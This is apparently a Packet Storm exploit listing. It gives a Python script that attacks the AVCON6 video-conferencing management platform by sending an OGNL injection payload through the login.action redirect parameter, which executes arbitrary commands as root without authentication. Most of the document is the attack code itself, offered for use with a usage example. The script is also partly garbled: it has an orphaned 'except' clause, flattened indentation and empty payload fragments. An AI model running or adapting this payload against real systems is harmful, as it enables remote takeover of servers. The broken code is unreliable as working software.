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AVCON6 Systems Management Platform Remote Root

๐Ÿ—“๏ธย 10 Sep 2019ย 00:00:00Reported byย Nassim AsrirTypeย 
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 233ย Views

AVCON6 Systems Management Platform Remote Root Command Executio

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`# Exploit Title: AVCON6 systems management platform - OGNL - Remote root command execution  
# Date: 10/09/2018  
# Exploit Author: Nassim Asrir  
# Contact: [email protected] |  
# CVE: N\A  
# Tested On: Windows 10(64bit) / 61.0b12 (64-bit)  
# Thanks to: Otmane Aarab  
# Example below:  
# python ./ http://server:8080/ id   
# Testing Target: http://server:8080/  
# uid=0(root) gid=0(root)  
# Vendor:  
# About the product: The AVCON6 video conferencing system is the most complete set of systems, including multi-screen multi-split screens and systems that are integrated with H323/SIP protocol devices. High-end video conferencing   
# software ideal for Room Base environments and performance requirements. Multi-party video conferencing can connect thousands of people at the same time.  
# I am not responsible for any wrong use.  
# -*- coding: utf-8 -*-  
import urllib2  
import httplib  
def exploit(url, cmd):  
payload = 'login.action?redirect:'  
payload += '${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22'+cmd+'%22})).'  
payload += 'start(),%23b%3d%23a.getInputStream(),'  
payload += ','  
payload += ',%23e%3dnew%20char[50000],%23d'  
payload += '.read(%23e),%23matt%3d%23context.'  
payload += 'get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),'  
payload += '%23matt.getWriter().println(%23e),%23matt.'  
payload += 'getWriter().flush(),%23matt.getWriter()'  
payload += '.close()}'  
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'}  
request = urllib2.Request(url+payload, headers=headers)  
page = urllib2.urlopen(request).read()  
except httplib.IncompleteRead, e:  
page = e.partial  
return page  
if __name__ == '__main__':  
import sys  
if len(sys.argv) != 3:  
print("[*] http://target/ id")  
print('[*] Avcon6-Preauh-Remote Command Execution')  
url = sys.argv[1]  
cmd = sys.argv[2]  
print("[*] Executed Command: %s\n" % cmd)  
print("[*] Target: %s\n" % url)  
exploit(url, cmd)  

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